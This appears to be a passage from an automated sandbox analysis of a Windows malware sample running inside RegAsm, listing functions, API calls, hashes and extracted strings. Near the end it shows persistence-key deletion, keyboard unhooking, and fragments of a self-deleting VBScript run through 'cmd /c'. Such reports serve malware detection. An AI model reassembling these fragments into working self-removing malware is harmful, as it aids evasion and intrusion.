                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                          Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                          Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                          • ExitProcess.KERNEL32 ref: 10004AEE
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                          Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                          • ExitProcess.KERNEL32 ref: 0044338F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                          Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$CloseDataOpen
                          • String ID:
                          • API String ID: 2058664381-0
                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                          Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandleOpenResume
                          • String ID:
                          • API String ID: 3614150671-0
                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                          Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandleOpenSuspend
                          • String ID:
                          • API String ID: 1999457699-0
                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                          Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID: MZ@
                          • API String ID: 2325560087-2978689999
                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                          Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                          Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                          Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID: JD
                          • API String ID: 1084509184-2669065882
                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                          Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: GetLocaleInfoEx
                          • API String ID: 2299586839-2904428671
                          • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                          • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                          Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                          • String ID:
                          • API String ID: 1661935332-0
                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                          Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$InfoLocale_abort
                          • String ID:
                          • API String ID: 1663032902-0
                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                          Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale_abort_free
                          • String ID:
                          • API String ID: 2692324296-0
                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                          Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                          Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                          Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                          Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.|,004752F0,?,pth_unenc), ref: 0040B8F6
                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                          • ExitProcess.KERNEL32 ref: 0040D80B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                          • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                          • API String ID: 1861856835-1447701601
                          • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                          • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                          Function 0040D0D1 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 260registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.|,004752F0,?,pth_unenc), ref: 0040B8F6
                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
